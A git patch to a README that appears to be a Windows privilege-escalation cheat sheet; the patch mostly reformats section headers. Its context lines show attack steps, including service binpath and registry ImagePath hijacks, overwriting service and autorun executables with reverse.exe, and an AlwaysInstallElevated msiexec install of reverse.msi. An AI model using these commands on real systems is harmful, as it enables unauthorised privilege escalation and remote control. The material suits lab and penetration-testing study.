From 358bee78bbde743627f8f38e6aa8f57c3e30b9b4 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Sat, 3 Sep 2022 09:58:04 -0400
Subject: [PATCH] Update README.md
---
README.md | 52 +++++++++++++++++++++++++++++-----------------------
1 file changed, 29 insertions(+), 23 deletions(-)
diff --git a/README.md b/README.md
index b3ebe02..6b7fc83 100644
--- a/README.md
+++ b/README.md
@@ -734,9 +734,10 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
.\winPEASany.exe quiet servicesinfo
-#####################################
-# 1. Insecure Service Properties ####
-#####################################
+
+#########################################################################
+#### 1. Insecure Service Properties #####################################
+#########################################################################
# Verify permissions of a service using accesschk
.\accesschk.exe /accepteula -uwcqv user {SERVICE}
@@ -753,9 +754,10 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\""
# Start a service:
net start {SERVICE}
-###############################
-# 2. Unquoted Service Path ####
-###############################
+
+#########################################################################
+##### 2. Unquoted Service Path ##########################################
+#########################################################################
# Verify permissions of to start service using accesschk
.\accesschk.exe /accepteula -uwcqv user {SERVICE}
@@ -770,9 +772,10 @@ copy reverse.exe {BINARY PATH: ex. "C:\Program Files\Unquoted Path Service\Commo
net start {SERVICE}
-###################################
-# 3. Weak Registry Permissions ####
-###################################
+
+#########################################################################
+#### 3. Weak Registry Permissions #######################################
+#########################################################################
# Check regsvc for weak entries using powershell
powershell -exec bypass
@@ -794,9 +797,10 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND
# Start the service:
net start regsvc
-###################################################################
-# 4. Insecure Service Executables (File Permissions: Everyone) ####
-###################################################################
+
+#########################################################################
+##### 4. Insecure Service Executables (File Permissions: Everyone) ######
+#########################################################################
# Verify permissions of a service using accesschk
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
@@ -810,9 +814,9 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepe
# Start the service
net start filepermsvc
-#######################
-# 5. DLL Hijacking ####
-#######################
+#########################################################################
+#### 5. DLL Hijacking ###################################################
+#########################################################################
# Verify permissions of to start service using accesschk
.\accesschk.exe /accepteula -uvqc dllsvc
@@ -841,17 +845,19 @@ net stop dllsvc
net start dllsvc
```
-
+
#### Registry Exploits
-```bash
+```ps1
-# 1. AutoRuns
+#########################################################################
+#### 1. AutoRuns ########################################################
+#########################################################################
# Requires computer restart for priv esc.
-# Enumeration Commands
+# Winpeas Enumeration
.\winPEASany.exe quiet applicationsinfo
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
@@ -863,11 +869,12 @@ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
-
-# 2. AlwaysInstallElevated
+#########################################################################
+#### 2. AlwaysInstallElevated ###########################################
+#########################################################################
-# Enumeration to see if both registry values are set
+# Winpeas Enumeration to see if both registry values are set
.\winPEASany.exe quiet windowscreds
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
@@ -883,7 +890,6 @@ msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
-
```bash
# Windows Enumeration Commands